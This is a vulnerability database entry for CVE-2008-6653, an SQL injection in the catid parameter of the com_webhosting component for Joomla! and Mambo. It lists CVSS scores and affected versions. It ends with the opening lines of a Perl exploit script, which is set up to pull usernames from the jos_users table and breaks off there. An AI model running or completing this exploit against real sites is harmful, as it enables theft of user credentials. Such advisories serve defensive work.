7.5
CVSSv2

CVE-2008-6653

Published: 07/04/2009 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in webhosting.php in the Webhosting Component (com_webhosting) module prior to 1.1 RC7 for Joomla! and Mambo allows remote malicious users to execute arbitrary SQL commands via the catid parameter to index.php.

Vulnerable Product Search on Vulmon Subscribe to Product

wh-com com_webhosting

wh-com com_webhosting 1.1

wh-com com_webhosting 0.5.3

wh-com com_webhosting 0.5

wh-com com_webhosting 1.0.1

wh-com com_webhosting 1.0

wh-com com_webhosting 0.5.6

wh-com com_webhosting 0.5.5

wh-com com_webhosting 0.5.4

Exploits

#!/usr/bin/perl #eSploit Framework - Inphex use Digest::MD5 qw(md5 md5_hex md5_base64); use LWP::UserAgent; use HTTP::Cookies; use Switch; $host_ = shift; $path_ = shift; $id_ = shift; $non_find = shift; #choose anything thats inside the article of id $column = "username"; #change if needet $table = "jos_users"; #change if needet $info{'info'} = { ...